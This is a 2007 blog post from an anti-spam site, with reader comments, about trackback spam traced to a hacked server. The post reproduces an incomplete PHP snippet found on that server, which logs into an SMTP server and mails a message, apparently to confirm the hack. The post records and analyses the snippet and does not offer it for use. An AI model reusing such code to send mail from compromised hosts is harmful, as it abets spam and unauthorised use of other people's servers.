Damn Spam!
Search 

Topics

User Functions






    Lost your password?

Hacked server spamming

    
Saturday, September 15 2007 @ 11:00 CEST
Contributed by: Dirk

Looking through the Bad Behavior logs, I've noticed a bunch of rejected trackback spam attempts from 64.71.177.84, belonging to Hurricane Electric (Not the first time I've seen that name, btw. They seem to be popular with the spammers, for whatever reason ...).

Well, I decided to type that IP address into my browser and got this piece of PHP code: 

; $from_mail = "phpauth@yandex.ru"; $to_mail = "grigory@mail.astrakhan.ru"; $message = "Subject: testnFrom: $from_mailnTo: $to_mailntest"; $host = "smtp.yandex.ru"; $port = 25; $errno = 30; $errstr = 1; $timeout = 1; $handle = fsockopen($host, $port, $errno, $errstr, $timeout); fputs($handle, "EHLO $hostrn"); echo fread($handle, 4096) . "

"; fputs($handle, "AUTH LOGINrn"); echo fread($handle, 4096) . "

"; fputs($handle, base64_encode($user) . "rn"); echo fread($handle, 4096) . "

"; fputs($handle, base64_encode($pass) . "rn"); echo fread($handle, 4096) . "

"; fputs($handle, "MAIL FROM:<$from_mail>rn"); echo fread($handle, 4096) . "

"; fputs($handle, "RCPT TO:<$to_mail>rn"); echo fread($handle, 4096) . "

"; fputs($handle, "DATArn"); echo fread($handle, 4096) . "

"; fputs($handle, "$messagern.rn"); echo fread($handle, 4096) . "

"; fputs($handle, "QUITrn"); echo fread($handle, 4096) . "

"; fclose($handle); ?>
Filed under: Miscellaneous
()

View Printable Version

Trackback

Trackback URL for this entry: http://spam.tinyweb.net/trackback.php/hacked-server

No trackback comments for this entry.
Hacked server spamming | 2 comments | Create New Account
The following comments are owned by whomever posted them. This site is not responsible for what they say.
Hacked server spamming
This is interesting. Makes me wonder if my trackback is even working on my site over at www.spacequad.com for users to make a post that would allow me to even have a link in one of my messages. I know I did a manual trackback from this site awhile back, but as of 8 months ago, nada a thing.

I highly doubt that this script even works, well not in its present form atleast.

Michael

---
Ironmax

Authored by: ironmax on Saturday, September 15 2007 @ 11:43 CEST
[ Reply to This | # ]
Hacked server spamming

Well, that (incomplete) piece of code attempts to send an email (Geeklog ate the backslashes - "rn" stands for a carriage return + linefeed). Looks like some sort of confirmation email that the hack has succeeded. The trackbacks are probably sent from some other script on the same server.

Authored by: Dirk on Saturday, September 15 2007 @ 12:04 CEST
[ Reply to This | # ]

Copyright © 2008 Damn Spam! Powered By Geeklog